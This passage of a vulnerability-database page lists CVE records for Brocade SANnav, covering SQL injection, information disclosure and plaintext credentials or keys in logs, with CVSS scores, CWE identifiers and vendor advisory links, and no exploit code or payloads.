  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.289Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "SQL Injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:01:38.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28163",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "SQL Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1842"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28163",
    "datePublished": "2022-05-06T16:01:38.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.289Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-15385 (GCVE-0-2020-15385)

Vulnerability from nvd – Published: 2021-06-09 15:42 – Updated: 2024-08-04 13:15
VLAI?
Summary
Brocade SANnav before version 2.1.1 allows an authenticated attacker to list directories, and list files without permission. As a result, users without permission can see folders, and hidden files, and can create directories without permission.
Severity ?
No CVSS data available.
CWE
  • information disclosure vulnerability
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: Brocade SANnav before version 2.1.1
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T13:15:20.385Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1486"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANnav before version 2.1.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before version 2.1.1 allows an authenticated attacker to list directories, and list files without permission. As a result, users without permission can see folders, and hidden files, and can create directories without permission."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "information disclosure vulnerability",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-06-09T15:42:57.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1486"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2020-15385",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANnav before version 2.1.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before version 2.1.1 allows an authenticated attacker to list directories, and list files without permission. As a result, users without permission can see folders, and hidden files, and can create directories without permission."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "information disclosure vulnerability"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1486",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1486"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2020-15385",
    "datePublished": "2021-06-09T15:42:57.000Z",
    "dateReserved": "2020-06-29T00:00:00.000Z",
    "dateUpdated": "2024-08-04T13:15:20.385Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-15384 (GCVE-0-2020-15384)

Vulnerability from nvd – Published: 2021-06-09 15:42 – Updated: 2024-08-04 13:15
VLAI?
Summary
Brocade SANNav before version 2.1.1 contains an information disclosure vulnerability. Successful exploitation of internal server information in the initial login response header.
Severity ?
No CVSS data available.
CWE
  • information disclosure vulnerability
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: Brocade SANnav before version 2.1.1
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T13:15:20.726Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1485"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANnav before version 2.1.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANNav before version 2.1.1 contains an information disclosure vulnerability. Successful exploitation of internal server information in the initial login response header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "information disclosure vulnerability",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-06-09T15:42:52.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1485"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2020-15384",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANnav before version 2.1.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANNav before version 2.1.1 contains an information disclosure vulnerability. Successful exploitation of internal server information in the initial login response header."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "information disclosure vulnerability"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1485",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2021-1485"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2020-15384",
    "datePublished": "2021-06-09T15:42:52.000Z",
    "dateReserved": "2020-06-29T00:00:00.000Z",
    "dateUpdated": "2024-08-04T13:15:20.726Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-12774 (GCVE-0-2025-12774)

Vulnerability from cvelistv5 – Published: 2026-02-03 01:28 – Updated: 2026-02-03 15:31
VLAI?
Title
SQL queries with sensitive information printed in logs with Brocade SANnav before 3.0
Summary
A vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file. An attacker with access to Brocade SANnav supportsave file, could open the file and then obtain sensitive information such as details of database tables and encrypted passwords.
Severity ?
4.6 (Medium)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: SANnav before 3.0
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12774",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T15:26:15.893390Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T15:31:59.719Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "SANnav before 3.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eA vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file.\u003c/span\u003e\u0026nbsp;\u003cspan style=\"background-color: transparent;\"\u003eAn attacker with access to Brocade SANnav supportsave file, could open the file and  then obtain sensitive information such as details of database tables and encrypted passwords.\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in the migration script for Brocade SANnav before 3.0 could allow the collection of database sql queries in the SANnav support save file.\u00a0An attacker with access to Brocade SANnav supportsave file, could open the file and  then obtain sensitive information such as details of database tables and encrypted passwords."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:57:22.992Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36848"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "SQL queries with sensitive information printed in logs with Brocade SANnav before 3.0",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12774",
    "datePublished": "2026-02-03T01:28:43.430Z",
    "dateReserved": "2025-11-05T20:07:09.482Z",
    "dateUpdated": "2026-02-03T15:31:59.719Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12773 (GCVE-0-2025-12773)

Vulnerability from cvelistv5 – Published: 2026-02-03 00:38 – Updated: 2026-02-03 20:46
VLAI?
Title
Plain password is generated in the audit logs while executing update-reports-purge-settings.sh script with Brocade SANnav before 2.4.0a
Summary
A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs. The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.
Severity ?
7.1 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-209 - Generation of Error Message Containing Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before 2.4.0a
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12773",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T20:45:38.650203Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T20:46:49.012Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before 2.4.0a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eA vulnerability in \u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003eupdate-reports-purge-settings.sh\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003e script logging for \u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs.\u003c/span\u003e\u0026nbsp;\u003cspan style=\"background-color: transparent;\"\u003eThe vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs.\u00a0The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-209",
              "description": "CWE-209 Generation of Error Message Containing Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:58:46.979Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36847"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Plain password is generated in the audit logs while executing update-reports-purge-settings.sh script with Brocade SANnav before 2.4.0a",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12773",
    "datePublished": "2026-02-03T00:38:08.909Z",
    "dateReserved": "2025-11-05T20:06:40.271Z",
    "dateUpdated": "2026-02-03T20:46:49.012Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12772 (GCVE-0-2025-12772)

Vulnerability from cvelistv5 – Published: 2026-02-02 22:41 – Updated: 2026-02-04 16:53
VLAI?
Title
Plaintext Switch admin login password is seen in Brocade SANnav support save
Summary
Brocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs. When OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password.
Severity ?
8.5 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12772",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T15:46:39.820278Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T16:53:20.826Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eWhen OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password.\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "Brocade SANnav before 2.4.0b logs the Brocade Fabric OS Switch admin password on the SANnav support save logs.\n\nWhen OOM occurs on a Brocade SANnav server, the call stack trace for the Brocade switch is also collected in the heap dump file which contains this switch password in clear text. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the switch admin password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "LOW",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T01:59:41.935Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36846"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Plaintext Switch admin login password is seen in Brocade SANnav support save",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12772",
    "datePublished": "2026-02-02T22:41:13.921Z",
    "dateReserved": "2025-11-05T20:05:22.781Z",
    "dateUpdated": "2026-02-04T16:53:20.826Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12679 (GCVE-0-2025-12679)

Vulnerability from cvelistv5 – Published: 2026-02-02 21:41 – Updated: 2026-02-04 16:54
VLAI?
Title
Plain text pbe key visible in audit log during Brocade SANnav migration from 2.4.0a to 3.0.0
Summary
A vulnerability in Brocade SANnav before 2.4.0b prints the Password-Based Encryption (PBE) key in plaintext in the system audit log file. The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the pbe key. Note: The vulnerability is only triggered during a migration and not in a new installation. The system audit logs are accessible only to a privileged user on the server. These audit logs are the local server VM’s audit logs and are not controlled by SANnav. These logs are only visible to the server admin of the host server and are not visible to the SANnav admin or any SANnav user.
Severity ?
7.1 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: SANnav before 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12679",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T15:46:50.496667Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T16:54:14.291Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "SANnav before 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA vulnerability in Brocade SANnav before 2.4.0b prints the \nPassword-Based Encryption (PBE) key in plaintext in the system audit log\n file. The vulnerability could allow a remote authenticated attacker \nwith access to the audit logs to access the pbe key.\u003c/p\u003e\u003cp\u003eNote: The vulnerability is only triggered during a migration and not \nin a new installation. The system audit logs are accessible only to a \nprivileged user on the server.\u003c/p\u003e\n\n\u003cp\u003eThese audit logs are the local server VM\u2019s audit logs and are not \ncontrolled by SANnav. These logs are only visible to the server admin of\n the host server and are not visible to the SANnav admin or any SANnav \nuser.\u003c/p\u003e"
            }
          ],
          "value": "A vulnerability in Brocade SANnav before 2.4.0b prints the \nPassword-Based Encryption (PBE) key in plaintext in the system audit log\n file. The vulnerability could allow a remote authenticated attacker \nwith access to the audit logs to access the pbe key.\n\nNote: The vulnerability is only triggered during a migration and not \nin a new installation. The system audit logs are accessible only to a \nprivileged user on the server.\n\n\n\nThese audit logs are the local server VM\u2019s audit logs and are not \ncontrolled by SANnav. These logs are only visible to the server admin of\n the host server and are not visible to the SANnav admin or any SANnav \nuser."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T02:01:36.206Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36845"
        }
      ],
      "source": {
